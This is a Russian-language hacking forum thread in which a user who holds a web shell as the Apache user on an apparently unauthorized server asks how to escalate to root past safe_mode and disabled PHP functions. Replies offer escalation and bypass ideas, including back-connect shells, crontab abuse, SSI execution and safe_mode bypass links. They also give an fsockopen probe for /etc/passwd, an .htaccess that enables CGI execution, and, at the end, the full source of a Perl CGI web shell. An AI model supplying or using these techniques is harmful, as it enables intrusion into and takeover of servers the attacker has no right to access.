Как пробиться к корню?

Получил шел с правами апача.
А там админ права хорошо раставил да еще поотключал много чево.
Выйти дальше /var/www/ немогу.
Прочитать /etc/passwd тоже немогу
Выполнять каманды опять же немогу.
В конфиге пас некуда неподходит кроме базы сайта.
Народ подскажите что можно сделать в таком случае?
Как пробиться к корню?

safe_mode: ON
Disable functions:
symlink
dl
shell_exec
exec
system
passthru
popen
proc_open
proc_nice
proc_get_status
proc_close
proc_terminate
posix_mkfifo
set_time_limit
imap_open
imap_body
imap_list
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
mb_send_mail

 

Есть доступ кронтабы посмотреть? /etc/crontab
Может там скрипты выполняются от пользователей с более большими привилегиями. И скрипты доступные для редактирования апача.

Версию ОС знаешь? Список пользователей в системе? Бэкконект или биндшел пробовал установить?

 

Чувак про курл забыл
http://securityvulns.ru/Mdocument888.html
попробуй еще это
http://securityvulns.ru/news/PHP/htacces/safemodebypas.html

 

procedure
Просмотреть я нечево немогу дальше /var/www/
Нашел файл на редатирование под пользователем.
Но из этого нечего неполучилось все осталось попрежнему только права стали (ingres).
Linux 2.6.22-ovz005_openVZ #3 SMP Wed Feb 13 17:25:54 EET 2008 x86_64
Списка пользователей я немогу узнать прав нехватает.
Команды выполнять немогу на серваке запрещено.
Бэкконект или биндшел некатит режется.

 

ChaaK
Какой курл мне закачивать нечево ненадо.
Сылку посмотрю.

 

Или вот посмотри: xakep.ru/post/26964/default.asp
Тут главная задача норм шелл получить, а ядро там не очень новое.

 

2 Ky3bMu4 2008 года это неочень новое?патченное ядрышко..вполне приличное.

2 ТС - можешь спокойно забить на сервак.много ты не потеряешь, только время убьешь зря...
ибо запрещены

 

спс за сылку очень позновательно.
но это непошло там немного править надо.
задача да норм шел получить только как?
сейфмод жоско рубит все.

 

забить жалко серв интересный.
потерять можно и много.
а время и так много убил.

 

cgi-bin дира есть? если есть,лей цгишный\перловый шелл..ограничения отпадут практически.

 

cgi-bin в вебе есть но записать прав нехватает.
страно права пользователя файла а редактить немогу.
там файло лежит но их редактить немогу.
при запуске их ошибка 500.

вот через это можно узнать есть файл или нету.
<?php
$fp = fsockopen ("unix://../../../../../../etc/passwd",0);
if ($fp) { fclose ($fp); }
?>
если файл есть ответ : Permission denied
если файла нету ответ : No such file or directory

 

не обязательно cgi-bin для перл шелла
выбирай любую диру, лей туда .htaccess
Options Indexes FollowSymLinks ExecCGI
AppType application/x-httpd-cgi .pl
и лей в эту диру .pl шелл

 

если apache работает с mod_include, то можно выполнять команды посредством SSI
https://forum.antichat.ru/showthread.php?t=37928

 

да apache работает с mod_include.
попробовал в ответ чистая страница в коде тож нема.
ошибок небыло.вроде проходит запрос а ответ режется.
на хакер.ру есть видео по проникновению на Agnitum.com там также приминялся этот способ.

 

залил .htaccess и shell.pl в диру с правами.
при запросе к shell.pl вылезла ошибка 500.
после решил перезаписать .htaccess вылезла опять ошибка 500.
потом обратился к sh.php и снова ошибка 500.
все лежало в одной папке.
недоумение! и папка пропала О_О.
админ не дремлет.
снес ее.
придется терь ждать пока успокоится.

 

1west
чмод 755 на перл шелл поставил?

 

интересно,как я ево поставлю без выполнения команд?

 

В r57 есть возможность установки прав под safe-mode =on.

 

1west
в пшп есть функция chmod()
chmod('file',0755)
Помойму так, при сейф моде она работает

 

ага права поставил на шел.
в .htaccess прописал это
Options Indexes
Options FollowSymLinks ExecCGI
AddType application/x-httpd-cgi .pl
php шел нормально работает а перловый выдает ошибка 500.
шел вот этот

#!/usr/bin/perl
use CGI qw/-no_xhtml :standard/;
use CGI::Carp qw(fatalsToBrowser);
print header(-charset => 'windows-1251'),
start_html(-lang => 'ru', -title => 'My shell',
# установим курсор в поле ввода команд
-onLoad => "document.forms[0].vvod.focus()");
if ( param() ) { # если мы ввели команду
my $vvod = param('vvod');
# покажем нашу команду для самоконтроля
print $vvod, "<br>\n";
# установим таймаут в секундах для выхода из нашей команды,
# если она задержалась с ответом
my $timeout = 30;
# анонимная подпрограммочка для обработки таймаута
local $SIG{ALRM} = sub { close KAN;
print 'Процесс прерван по таймауту</pre>';
die "timeout"; };
# вот и сам «шелл»
$pid = open(KAN, "$vvod 2>&1 |");
die "Cannot run program: $!.\n" unless ($pid);
eval {
alarm($timeout);
print '<pre>';
# читаем вывод команды и направляем его на дисплей
while( <KAN> ) { print; }
print '</pre>';
alarm(0);
close KAN;
}
}
# генерируем форму ввода команды
print start_form,
textfield(-name=>'vvod', -size=> 80, -value=> ''), submit('удачи!'),
endform, end_html;
exit(0);